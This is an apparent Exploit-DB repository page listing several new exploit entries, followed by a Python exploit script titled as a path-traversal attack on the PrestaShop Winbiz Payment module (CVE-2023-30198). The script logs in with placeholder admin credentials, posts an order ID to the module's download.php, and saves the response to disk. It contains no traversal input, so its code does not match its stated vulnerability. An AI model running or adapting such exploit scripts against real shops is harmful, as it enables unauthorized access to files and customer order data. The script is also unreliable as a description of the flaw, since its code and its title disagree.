7807e6f266
7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
61 lines
No EOL
2 KiB
Python
Executable file
61 lines
No EOL
2 KiB
Python
Executable file
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
|
|
# Date: 2023-06-20
|
|
# Dork: /modules/winbizpayment/downloads/download.php
|
|
# country: Iran
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : webapps
|
|
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
|
|
# Version: 17.1.3 (REQUIRED)
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-30198
|
|
|
|
import requests
|
|
import string
|
|
import random
|
|
|
|
# The base URL of the vulnerable site
|
|
base_url = "http://example.com"
|
|
|
|
# The URL of the login page
|
|
login_url = base_url + "/authentication.php"
|
|
|
|
# The username and password for the admin account
|
|
username = "admin"
|
|
password = "password123"
|
|
|
|
# The URL of the vulnerable download.php file
|
|
download_url = base_url + "/modules/winbizpayment/downloads/download.php"
|
|
|
|
# The ID of the order to download
|
|
order_id = 1234
|
|
|
|
# The path to save the downloaded file
|
|
file_path = "/tmp/order_%d.pdf" % order_id
|
|
|
|
# The session cookies to use for the requests
|
|
session_cookies = None
|
|
|
|
# Generate a random string for the CSRF token
|
|
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
|
|
|
|
# Send a POST request to the login page to authenticate as the admin user
|
|
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
|
|
session = requests.Session()
|
|
response = session.post(login_url, data=login_data)
|
|
|
|
# Save the session cookies for future requests
|
|
session_cookies = session.cookies.get_dict()
|
|
|
|
# Generate a random string for the CSRF token
|
|
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
|
|
|
|
# Send a POST request to the download.php file to download the order PDF
|
|
download_data = {"id_order": order_id, "csrf_token": csrf_token}
|
|
response = session.post(download_url, cookies=session_cookies, data=download_data)
|
|
|
|
# Save the downloaded file to disk
|
|
with open(file_path, "wb") as f:
|
|
f.write(response.content)
|
|
|
|
# Print a message indicating that the file has been downloaded
|
|
print("File downloaded to %s" % file_path) |